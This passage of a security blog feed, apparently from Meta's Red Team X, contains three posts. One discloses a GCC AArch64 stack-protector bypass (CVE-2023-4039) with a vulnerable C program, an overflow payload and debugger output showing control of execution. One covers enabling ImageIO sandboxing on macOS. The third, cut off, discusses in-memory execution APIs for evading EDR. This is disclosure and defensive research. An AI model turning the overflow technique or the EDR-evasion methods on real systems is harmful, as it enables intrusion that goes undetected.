	<span class="o">|</span>                               <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">stack_pointer_rtx</span> <span class="p">(</span><span class="n">aligned</span><span class="p">)</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">LR'</code> is the return address, so named because it’s saved from the <a href="https://developer.arm.com/documentation/dui0801/l/Overview-of-AArch64-state/Link-registers">LR</a> register, and is the target of nearly all stack smashing attacks. It may then seem like a feature, not a bug, to put it at a lower address than the locals: a contiguous overflow only lets an attacker write to memory past the vulnerable local, so this layout keeps the return address out of their reach! In practice though, the memory immediately past a function’s stack frame is almost always another stack frame (belonging to the calling function) with its own saved LR value that the attacker can manipulate to the same effect.</p>

<p>You may notice that the layout above makes no mention of a stack guard. That’s because GCC’s architecture-independent code treats the stack guard as a local, <a href="https://gcc.gnu.org/git/?p=gcc.git&amp;a=blob&amp;f=gcc%2Fcfgexpand.cc&amp;h=85a93a547c0b#l2286">placing it</a> at the very top of the local area without any input from the target backend. Implicit in that placement is an assumption that locals will always occupy one contiguous region with no saved registers interspersed. But that assumption doesn’t hold on AArch64: as shown in the diagram, dynamic allocations live at the very bottom of the stack frame, below the saved registers, with no intervening guard.</p>

<p>Dynamic allocations are just as susceptible to overflows as other locals. In fact, they’re arguably more susceptible because they’re almost always arrays, whereas fixed locals are often integers, pointers, or other types to which variable-length data is never written. GCC’s own heuristics for when to use a stack guard reflect this, with its man page saying this about <code class="language-plaintext highlighter-rouge">-fstack-protector</code> (emphasis ours):</p>

<blockquote>
  <p>Emit extra code to check for buffer overflows … by adding a guard variable to functions with vulnerable objects. This includes <strong>functions that call “alloca”</strong>, and functions with buffers larger than or equal to 8 bytes.</p>
</blockquote>

<h2 id="demonstration">Demonstration</h2>

<p>The following C program is vulnerable to a contiguous stack overflow attack even when compiled with <code class="language-plaintext highlighter-rouge">-fstack-protector</code> or <code class="language-plaintext highlighter-rouge">-fstack-protector-all</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Variable-length array</span>
    <span class="kt">uint8_t</span> <span class="n">input</span><span class="p">[</span><span class="n">atoi</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])];</span>

    <span class="kt">size_t</span> <span class="n">n</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
    <span class="n">fwrite</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">stdout</span><span class="p">);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We cross-compiled this program for AArch64 using Arm’s GCC 12.2.Rel1 <a href="https://developer.arm.com/downloads/-/arm-gnu-toolchain-downloads">prebuilt toolchain</a> and then ran it under QEMU, with debugging enabled, on an x86_64 host:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>aarch64-none-linux-gnu-gcc <span class="nt">-fstack-protector-all</span> <span class="nt">-O3</span> <span class="nt">-static</span> <span class="nt">-Wall</span> <span class="nt">-Wextra</span> <span class="nt">-pedantic</span> <span class="nt">-o</span> example-dynamic example-dynamic.c
<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'DDDDDDDDPPPPPPPPFFFFFFFFAAAAAAAA'</span> | qemu-aarch64 <span class="nt">-g</span> 5555 example-dynamic 8
</code></pre></div></div>

<p>We ask the program to make a dynamic allocation of size 8, which GCC rounds up to 16. The exploit payload mirrors the stack layout, with the eight “D”s representing the non-overflowing data, the eight “P”s padding out the actual allocation, the eight “F”s overwriting the saved frame pointer, and the eight “A”s overwriting the saved return address.</p>

<p>Attaching a debugger and resuming the program results in an immediate segfault with PC set to the address from our payload, showing we have full control over execution flow despite the stack guard:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gdb example-dynamic
GNU gdb <span class="o">(</span>GDB<span class="o">)</span> Fedora Linux 13.1-3.fc37
&lt;snip&gt;
<span class="o">(</span>gdb<span class="o">)</span> target remote :5555
Remote debugging using :5555
&lt;snip&gt;
<span class="o">(</span>gdb<span class="o">)</span> <span class="k">continue
</span>Continuing.

Program received signal SIGBUS, Bus error.
0x0041414141414141 <span class="k">in</span> ?? <span class="o">()</span>
<span class="o">(</span>gdb<span class="o">)</span> print/a <span class="nv">$pc</span>
<span class="nv">$1</span> <span class="o">=</span> 0x41414141414141
</code></pre></div></div>

<p>For comparison, the following program, which uses a fixed allocation of size 8 instead of a dynamic one, detects the overflow correctly (the “G”s in the payload overwrite the guard):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint8_t</span> <span class="n">input</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>

    <span class="kt">size_t</span> <span class="n">n</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
    <span class="n">fwrite</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">stdout</span><span class="p">);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>aarch64-none-linux-gnu-gcc <span class="nt">-fstack-protector-all</span> <span class="nt">-O3</span> <span class="nt">-static</span> <span class="nt">-Wall</span> <span class="nt">-Wextra</span> <span class="nt">-pedantic</span> <span class="nt">-o</span> example-static example-static.c
<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'DDDDDDDDGGGGGGGG'</span> | qemu-aarch64 example-static
<span class="k">***</span> stack smashing detected <span class="k">***</span>: terminated
Aborted <span class="o">(</span>core dumped<span class="o">)</span>
</code></pre></div></div>

<h2 id="response">Response</h2>

<p>Meta’s Red Team X reported this issue privately to Arm on May 31st, 2023. We would have preferred to report the issue to GCC, but at that time GCC had no documented private disclosure process. Progress has since been made on <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-August/626529.html">creating one</a>. Since every AArch64 maintainer in GCC’s <code class="language-plaintext highlighter-rouge">MAINTAINERS</code> file has an @arm.com email address, Arm was our next best choice.</p>

<p>Arm acknowledged our report immediately, and their compiler team confirmed our findings within a day. They had a fix ready by August 1st and met with us to agree on a coordinated disclosure process. Over the following month, Arm shared the patch with widely-used Linux distributions and other partners of theirs, both to get extra eyes on the patch and to allow those partners time to rebuild their software repositories. As it happens, one partner found an issue with Arm’s initial fix—involving a missing barrier against instruction reordering—that made it inadequate in certain cases. We delayed our initial disclosure date to allow Arm to distribute a revised version of the patch.</p>

<p>Arm has been extremely responsive throughout the process and has taken the lead to get the fix where it needs to go. We’d like to thank them for their professionalism.</p>

<p>Because GCC development happens in the open, we were unable to coordinate with GCC to announce new releases simultaneous with this post and other disclosures. However, <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-September/630054.html">Arm’s patches for the issue</a> are now on GCC’s mailing list, and we expect releases to follow in short order. The following other disclosures will also appear:</p>

<ul>
  <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-4039">CVE-2023-4039</a></li>
  <li><a href="https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64">Arm’s security bulletin</a></li>
  <li><a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf">Meta’s disclosure</a></li>
</ul>

<h2 id="prior-work">Prior work</h2>

<p>GCC’s ARM stack guards have a history of subtle correctness issues:</p>

<ul>
  <li><a href="https://blog.inhq.net/posts/faulty-stack-canary-arm-systems/">Faulty Stack Smashing Protection on ARM Systems</a> by Christian Reitter: writeup of a GCC bug that caused AArch32 stack guards to hold the address of the guard value rather than the value itself, making it much easier to guess.</li>
  <li><a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=85434">CVE-2018-12886</a>: a GCC bug that in certain cases let an attacker control what value an AArch32 stack guard was compared against by overwriting a different stack variable that was not itself protected.</li>
</ul>

<h2 id="appendix-assembly-analysis">Appendix: assembly analysis</h2>

<p>We graphed the proof-of-concept binaries from above using <a href="https://rizin.re/">Rizin</a>’s <a href="https://book.rizin.re/analysis/graphs.html"><code class="language-plaintext highlighter-rouge">agfd</code> command</a> to illustrate how the problem manifests in assembly. This is the disassembly graph of the buggy <code class="language-plaintext highlighter-rouge">example-dynamic</code>:</p>

<p><img src="https://rtx.meta.security/assets/images/CVE-2023-4039/example-dynamic-main.svg" alt="&quot;Control flow graph for dynamic allocation&quot;" /></p>

<p>There’s a lot happening, but the <strong>bold</strong> lines are the ones to focus on. The very first instruction in the function, <code class="language-plaintext highlighter-rouge">stp x29, x30, [sp, -0x20]!</code>, decrements the <code class="language-plaintext highlighter-rouge">sp</code> register by <code class="language-plaintext highlighter-rouge">0x20</code> (the <code class="language-plaintext highlighter-rouge">!</code> means modify <code class="language-plaintext highlighter-rouge">sp</code> instead of just calculating an offset), thereby reserving space for the function’s stack frame, then <strong>st</strong>ores a <strong>p</strong>air of registers at the bottom of that reserved space. Those registers, <code class="language-plaintext highlighter-rouge">x29</code> and <code class="language-plaintext highlighter-rouge">x30</code>, are the frame pointer and link register (LR) respectively. Recall that LR holds the return address that an attacker aims to control.</p>

<p>A few instructions later, <code class="language-plaintext highlighter-rouge">str x3, [x29, 0x18]</code> places the 8-byte stack guard at the top of the stack space. <code class="language-plaintext highlighter-rouge">x29</code>, the frame pointer, has been updated to match the decremented <code class="language-plaintext highlighter-rouge">sp</code>, a value it retains for the rest of the function. At this point, the stack looks like this (offsets relative to <code class="language-plaintext highlighter-rouge">x29</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x18 stack guard
 0x10 padding
 0x08 saved x29
 0x00 saved x30 (LR)  	&lt;-- x29, sp
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">sp</code>, on the other hand, doesn’t keep its value: to allocate the dynamically-sized <code class="language-plaintext highlighter-rouge">input</code> array, it’s decremented by <code class="language-plaintext highlighter-rouge">input</code>’s size (<code class="language-plaintext highlighter-rouge">sub sp, sp, x0</code>). It’s then passed as the first argument to <code class="language-plaintext highlighter-rouge">fread()</code>, which populates it with user-controlled data. Assuming a dynamic size of 8 (which GCC pads to 16), the stack now looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x18 stack guard
 0x10 padding
 0x08 saved x29
 0x00 saved x30 (LR)  	&lt;-- x29
-0x08 padding
-0x10 input[8]          &lt;-- sp
</code></pre></div></div>

<p>At this point, the issue is clear: an contiguous overflow of <code class="language-plaintext highlighter-rouge">input</code> reaches the saved LR before it even gets close to the stack guard, making the guard ineffective for detecting that overflow.</p>

<hr />

<p>For comparison, here’s the disassembly graph of <code class="language-plaintext highlighter-rouge">example-static</code>, which does not perform any dynamic allocation:</p>

<p><img src="https://rtx.meta.security/assets/images/CVE-2023-4039/example-static-main.svg" alt="&quot;Control flow graph for static allocation&quot;" /></p>

<p>The function begins exactly the same way, storing saved registers at the bottom of the frame and the stack guard at the top. But when it comes time to read user input, <code class="language-plaintext highlighter-rouge">sp</code> isn’t decremented again. Instead, the first argument to <code class="language-plaintext highlighter-rouge">fread()</code> is within the already-allocated space, <em>above</em> the saved registers (<code class="language-plaintext highlighter-rouge">add x0, sp, 0x10</code>). So we have a stack layout like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x18 stack guard
 0x10 input[8]
 0x08 saved x29
 0x00 saved x30 (LR)  	&lt;-- x29, sp
</code></pre></div></div>

<p>Here, the stack guard works just as it’s designed: since it immediately follows <code class="language-plaintext highlighter-rouge">input</code>, an attacker can’t manipulate anything further up the stack using a contiguous overflow without also changing the guard’s value.</p>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>April 27th, 2023: During an <a href="https://azeria-labs.com/">Azeria Labs</a> ARM exploitation training, we notice that one of the demo binaries has a misplaced stack canary and investigate the cause.</li>
  <li>May 31st, 2023: We disclose the issue privately to Arm, as GCC has no security contact and every MAINTAINER of GCC’s AArch64 backend is Arm-affiliated.</li>
  <li>May 31st, 2023: Arm’s Product Security Incident Response Team acknowledges and triages the report.</li>
  <li>June 1st, 2023: Arm confirms that the report is valid and asks if we intend to issue a CVE or if they should. We respond that we prefer the latter.</li>
  <li>July 13th, 2023: We remind Arm that the 90-day disclosure window is nearly halfway past and ask for a progress update.</li>
  <li>August 1st, 2023: Arm indicates they have a fix ready and requests a call with Meta to discuss coordinated disclosure.</li>
  <li>August 3rd, 2023: Arm and RTX meet. Arm proposes notifying distros and hyperscale partners prior to public disclosure. Meta agrees to that plan.</li>
  <li>August 21st, 2023: Arm and RTX meet again to finalize the disclosure timeline. We agree to make all advisories and patches public on August 29th, 90 days after RTX’s initial report, unless any of Arm’s partners request an extension.</li>
  <li>August 23rd, 2023: One of Arm’s partners requests disclosure be postponed by a week, so we set the new date to September 5th.</li>
  <li>August 30th, 2023: Arm notifies us that a compiler partner found a weakness in the patched mitigation and that they’ll need to revise their patch. We agree to postpone disclosure by another week, to September 12th, to allow time for that.</li>
  <li>September 12th, 2023: This post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf">our disclosure</a> <a href="https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64">Arm’s security advisory</a>, <a href="https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64">CVE-2023-4039</a>, and <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-September/630054.html">patches on GCC’s mailing list</a> all go live simultaneously.</li>
</ul>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="mitigation" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Sandboxing ImageIO media parsing in macOS</title><link href="https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS.html" rel="alternate" type="text/html" title="Sandboxing ImageIO media parsing in macOS" /><published>2023-09-11T00:00:00+00:00</published><updated>2023-09-11T00:00:00+00:00</updated><id>https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS</id><content type="html" xml:base="https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS.html"><![CDATA[<p>While assessing the potential impact of the latest <a href="https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/">BLASTPASS Zero-Click, Zero-Day Exploit</a> on our Family of Apps, we discovered a feature in ImageIO that moves image parsing to an out-of-process sandbox. This feature mitigates the effects of vulnerabilities related to image parsing on macOS similar to BLASTPASS. App developers can enable this feature on macOS by setting the <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference true. Anyone can enable this feature by setting the environment variable <code class="language-plaintext highlighter-rouge">IIOEnableOOP=YES</code> before launching an app. It is not available on iOS.</p>

<h2 id="background">Background</h2>

<p>In light of the BLASTPASS 0-day being <a href="https://gizmodo.com/apple-security-update-pegasus-zero-day-blastpass-1850817040">exploited in the wild</a>, we sought to understand how image parsing was performed on Apple devices.</p>

<p>Apple provides the <code class="language-plaintext highlighter-rouge">CGImage*</code> set of APIs that enable developers to conveniently work with various image formats. Although these APIs have a prefix indicating the CoreGraphics framework, the underlying parser code resides in ImageIO.framework. Developers may not use CoreGraphics APIs directly and may instead use UIKit’s <a href="https://developer.apple.com/documentation/uikit/uiimage?language=objc">UIImage</a> class which wraps <code class="language-plaintext highlighter-rouge">CGImage*</code> APIs and can be used to easily render an image in a UIKit application.</p>

<p>Information about Apple’s image parsing practices is scarce, with the exception of a <a href="https://googleprojectzero.blogspot.com/2020/04/fuzzing-imageio.html">2020 article by Project Zero</a> which mentioned that some formats like PSD were parsed out-of-process, while the majority were done in-process. Out-of-process sandboxing of media parsers raise attacker costs by requiring a sandbox escape before exploit code can gain access to app data. This is desirable from a defense perspective.</p>

<p>We wanted to understand which media formats were sandboxed out-of-process, if any.</p>

<h2 id="imageioxpcservice">ImageIOXPCService</h2>

<p>According to the Project Zero post, out-of-process image parsing is handled by the ImageIOXPCService service <code class="language-plaintext highlighter-rouge">/System/Library/Frameworks/ImageIO.framework/Versions/A/XPCServices/ImageIOXPCService.xpc/Contents/MacOS/ImageIOXPCService</code>.</p>

<p>Examining its exports, we discovered that it provides the same <code class="language-plaintext highlighter-rouge">CGImage*</code> APIs as ImageIO. A comparison of the decompiled code for these APIs revealed that they are very similar.</p>

<p>Additionally, both ImageIO and XPCService import libraries like libPNG, libJPEG, etc., suggesting that they share the same capabilities to parse these formats. The list of imports for ImageIO (left) and ImageIOXPCService (right) is provided below:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/symbol_trees.png" alt="&quot;Symbol trees showing ImageIO exports on the left and ImageIOXPCService on the right, listings are identical&quot;" /></p>

<p>The <a href="https://www.internalfb.com/phabricator/paste/view/P815421677">sandbox config</a> for ImageIOXPCService is located at <code class="language-plaintext highlighter-rouge">/System/Library/Sandbox/Profiles/com.apple.ImageIOXPCService.sb</code>.</p>

<p>Tracing XPC calls using <a href="https://newosxbook.com/tools/XPoCe.html">XPoCe</a>, we didn’t see any calls to <code class="language-plaintext highlighter-rouge">com.apple.imageioxpcservice</code>, but we did see telemetry from all the calls to ImageIO APIs, hinting that image parsing is being done in-process. We also did not see the ImageIOXPCService process show up in Activity Monitor, further confirming that no out-of-process was happening.</p>

<p>Despite signs that ImageIO is capable of out-of-process parsing, all of this pointed towards in-process execution being the default.</p>

<h2 id="debugging">Debugging</h2>

<p>At this point we needed clarity and reached for a debugger. There were a couple APIs that were good starting points:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">CGImageSourceCreateWithData</code> saves the reference to an image buffer, parses the header, and initializes a reader plugin based on the format of the image. The reader plugin is a format-specific plugin that knows how to handle each image format.</li>
  <li><code class="language-plaintext highlighter-rouge">CGImageSourceCreateImageAtIndex</code> lazily parses the image buffer when pixel data is accessed.</li>
</ul>

<p>Stepping through <code class="language-plaintext highlighter-rouge">CGImageSourceCreateWithData</code> we see reader initialization determining the image format.</p>

<p>The following code snippet shows <code class="language-plaintext highlighter-rouge">IIO_ReaderHandler::readerForBytes</code> initializing an XPC client before deciding whether to use an XPC server (out-of-process) or not (in-process) for parsing image header data. This pattern repeats when reader plugins prepare to parse image contents.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/XPC_decision.png" alt="&quot;Reader plugin initializing an XPC client before deciding whether to use the XPC server or do parsing in-proc&quot;" /></p>

<h2 id="in-proc-or-out-of-proc">In-Proc or Out-of-Proc?</h2>

<p>We have determined that ImageIO is capable of parsing media both in-process and out-of-process. However, the question remains: how does the library decide where to parse an image? There exists a set of functions beginning with “<code class="language-plaintext highlighter-rouge">useServerFor*</code>” which determines whether the library will use a remote XPC server (out-of-process) for a specific task.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/useServer_funcs.png" alt="&quot;Listing of various useServer* functions that decide whether the sandbox is enabled for different parsing stages&quot;" /></p>

<p>Let’s examine <code class="language-plaintext highlighter-rouge">IIOXPCClient::useServerForIdentification</code>, which determines whether header parsing will be performed locally or in a sandbox. Other <code class="language-plaintext highlighter-rouge">useServerFor*</code> functions are similar:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/macOS_useServer.png" alt="&quot;Ghidra decompilation of macOS' useServerForIdentification method, which is similar to the other useServer* funcs&quot;" /></p>

<p>In our experience, <code class="language-plaintext highlighter-rouge">param_1</code> is always <code class="language-plaintext highlighter-rouge">0xffffffff</code>, and the deciding factor is the byte at an offset of 0x24. By default, the byte at this offset was set, which caused <code class="language-plaintext highlighter-rouge">useServerForIdentification</code> to return false and made all parsing in-process on macOS.</p>

<h3 id="forcing-out-of-proc">Forcing Out-of-Proc</h3>

<p>Modifying this byte in the debugger forced out-of-process parsing, causing ImageIOXPCService to appear in the Activity Monitor. Success!</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/ActivityMonitor.png" alt="&quot;macOS' Activity Monitor showing the ImageIOXPCService process running, proving ImageIO is sandboxed&quot;" /></p>

<p>Tracing what initialized that byte, we discovered <code class="language-plaintext highlighter-rouge">IIOXPCClient_block_invoke</code>:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/block_invoke.png" alt="&quot;The block_invoke function's decompilation, showing where the IOPreference is fetched&quot;" /></p>

<p>It sets the value at offset 0x24 into <code class="language-plaintext highlighter-rouge">IIOXPCClientObject</code> based on the <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference. Let’s take a look at how it works:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/IOPreferencesGetBoolean.png" alt="&quot;IOPreferences GetBoolean internals, decompilation showing how it first looks for an env var then pulls from CFPreferences&quot;" /></p>

<p>First, it checks if an environment variable called <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> is set. If so, this takes precedence over any other preference. We can test our application by setting <code class="language-plaintext highlighter-rouge">IIOEnableOOP=YES</code> to verify that parsing is now occurring out-of-process.</p>

<p>If the environment variable is not set, it falls back to reading a <a href="https://developer.apple.com/documentation/corefoundation/1515497-cfpreferencescopyappvalue?language=objc">CFPreferences</a> value from an app-specific key-value preference store that our application can write to.</p>

<p>To test this, we can call the following to set that app-specific preference:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CFPreferencesSetAppValue(CFSTR("IIOEnableOOP"), kCFBooleanTrue, kCFPreferencesCurrentApplication);
</code></pre></div></div>

<p>And it works! Now our application is doing OOP sandboxed parsing for all images that use ImageIO APIs. Note that this preference is persistent and will be saved between different application runs.</p>

<h3 id="does-this-work-on-ios">Does this work on iOS?</h3>

<p>Unfortunately, this does not work on iOS. The ImageIOXPCService binary is not present on iOS, and we can see that the <code class="language-plaintext highlighter-rouge">useServerForIdentification</code> function body is <code class="language-plaintext highlighter-rouge">#ifdef</code>’d blank. The <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference has no effect either.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/iOS_useServer.png" alt="&quot;Decompilation of iOS' useServer* function showing it is an empty stub, not yet implemented&quot;" /></p>

<h4 id="update-as-of-nov-2023-ios-17">Update as of Nov 2023 (iOS 17):</h4>
<p>As of iOS 17 we see this feature show up in code, however, it is gated behind <code class="language-plaintext highlighter-rouge">IIO_OSAppleInternalBuild()</code>.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/iOS17_internal_check.png" alt="&quot;Decompilation of iOS 17 showing implementation gated behind apple internal build check&quot;" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>While this is an undocumented feature, setting the <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference true appears to correctly sandbox ImageIO on macOS and falls back gracefully to in-process parsing on iOS.</p>

<p>Examining the image parsing code in ImageIOXPCService, it resembles the code found in ImageIO itself, and it imports the same libraries used for image parsing</p>

<p>From our testing on macOS 13.5.1, we have not encountered issues with out-of-process parsing. We have not measured the performance impact, but if your application is not heavily reliant on images, enabling this feature is a meaningful security improvement.</p>]]></content><author><name>Nik Tsytsarkin, Red Team X</name></author><category term="mitigation" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">In-Memory Execution in macOS: the Old and the New</title><link href="https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS.html" rel="alternate" type="text/html" title="In-Memory Execution in macOS: the Old and the New" /><published>2022-12-19T00:00:00+00:00</published><updated>2022-12-19T00:00:00+00:00</updated><id>https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS</id><content type="html" xml:base="https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS.html"><![CDATA[<p>As part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.</p>

<p>There are a few APIs that can be used for in-memory execution of code in macOS. The most well known is an API in dyld, <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>, which is heavily documented but has become less effective since it started to leave file artifacts on disk in dyld3. However, there are two more APIs that can still be used for this purpose but aren’t well documented, <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> and <code class="language-plaintext highlighter-rouge">CFBundleCreate</code>.</p>

<p>In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> and <code class="language-plaintext highlighter-rouge">CFBundleCreate</code> to load a bundle from disk and execute it.</p>

<h2 id="nscreateobjectfileimagefrommemory">NSCreateObjectFileImageFromMemory</h2>

<p>Use of <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> and <code class="language-plaintext highlighter-rouge">NSLinkModule</code> has been documented several times in the past <a href="https://malwareunicorn.org/workshops/macos_dylib_injection.html#5">[1]</a>, <a href="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf">[2]</a>. These functions in the dylib loader allow us to execute something straight from memory.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> is able to load a Mach-O from memory.</li>
  <li><code class="language-plaintext highlighter-rouge">NSLinkModule</code> adds loaded dylib memory space to current process. It facilitates a loader when trying to leverage <code class="language-plaintext highlighter-rouge">NSCreateObjectFileFromMemory</code> API.</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> has also been abused several times in the <a href="https://objective-see.com/blog/blog_0x51.html">past</a>.</p>

<h3 id="recent-changes">Recent Changes</h3>

<p>Starting with dyld3, Apple has changed the <code class="language-plaintext highlighter-rouge">NSLinkModule</code> function to stop doing in-memory loading directly. Now, if a program attempts to load something in-memory, it is written to disk with a string fingerprint <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory-XXXXXXXX</code> as shown in the <a href="https://github.com/apple-oss-distributions/dyld/blob/3f24a36068a96722cf3acbd5087983ce658e9d70/dyld3/APIs_macOS.cpp#L154">following excerpt.</a></p>

<pre><code class="language-C++">NSModule NSLinkModule(NSObjectFileImage ofi, const char* moduleName, uint32_t options)
{
    DYLD_LOAD_LOCK_THIS_BLOCK
    log_apis("NSLinkModule(%p, \"%s\", 0x%08X)\n", ofi, moduleName, options);

    __block const char* path = nullptr;
    bool foundImage = gAllImages.forNSObjectFileImage(ofi, ^(OFIInfo &amp;image) {
        // if this is memory based image, write to temp file, then use file based loading
        if ( image.memSource != nullptr ) {
            // make temp file with content of memory buffer
            image.path = nullptr;
            char tempFileName[PATH_MAX];
            const char* tmpDir = getenv("TMPDIR");
            if ( (tmpDir != nullptr) &amp;&amp; (strlen(tmpDir) &gt; 2) ) {
                strlcpy(tempFileName, tmpDir, PATH_MAX);
                if ( tmpDir[strlen(tmpDir)-1] != '/' )
                    strlcat(tempFileName, "/", PATH_MAX);
            }
            else
                strlcpy(tempFileName,"/tmp/", PATH_MAX);
            strlcat(tempFileName, "NSCreateObjectFileImageFromMemory-XXXXXXXX", PATH_MAX);
...
</code></pre>

<p>This new behavior essentially means that “in-memory” execution nature of this API is deprecated. And now, usage of this API is detectable.</p>

<h3 id="attacker-hat-on">Attacker Hat on</h3>

<p>This API now leaves a trace on the system, and is therefore less suitable to use as a capability in malware.</p>

<h3 id="defender-hat-on">Defender Hat on</h3>

<p>In dyld3, the usage of this API is quite easily detectable. All we have to do is look for file modifications which contain the string <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> from any EDR agent.</p>

<p>I’d thought about detecting this API before the dyld3 changes and came up with the following.</p>

<p>In-memory execution is quite hard to detect without memory forensic signals. Apple has removed kernel extensions, and hence essentially gotten rid of memory dumps in a macOS system. Volexity suggests they have a workaround for this, but it involves allowlisting the kext that they inject into memory. The other way to detect this would be to use YARA signatures in order to find and match function signatures on the loader binary, and chain them together in a sequence.</p>

